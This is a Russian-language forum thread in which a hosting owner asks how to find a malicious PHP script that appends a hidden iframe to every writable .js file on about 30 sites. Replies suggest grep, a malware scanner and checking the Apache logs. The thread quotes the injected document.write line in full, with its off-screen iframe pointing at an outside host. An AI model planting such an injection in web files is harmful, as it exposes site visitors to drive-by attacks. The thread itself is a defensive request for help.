Вредоносный php скрипт пишет свой код во все .js на хостинге

Такая проблема. Ко мне на хостинг попал вредоносный php скрипт, возможно с бесплатными шаблонами или компонентами для joomla. На аккаунте около 30 сайтов. После этого во всех *.js, где CHMOD позволял, стали добавляться строки вида ;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://bcjnxw.ns2.name/d32905cbfd64d82415ca3c8b0b228.xan?11"></iframe>');

Если удалить iframe и поставить chmod 444 на js файлы, то проблема отпадает. Но как удалить сам вредный скрипт? Как его найти?

 

какой скрипт? да тебя просто ломанули вот и фреймят всё что можно

 

Это php скрипт. Я же говорю, если на файле стоит CHMOD 444, то в него никакой вредоносный код не записывается. А значит, пишут не с ftp а по web.

 

а при чём тут фтп? редачить можно и через шелл

 

см. выше
разницу в никсах знаешь между пользователями www и root ?

 

Шелл от рута запустили, не?

 

Не. Я же и так объяснил, что это php скрипт. Как его вычислить?

 

grep или ItBolt как-то такт название скрипта, ищет шеллы, бэкдоры, и прочие вредоносы.

 

Не пробовал логи апача читать одмин?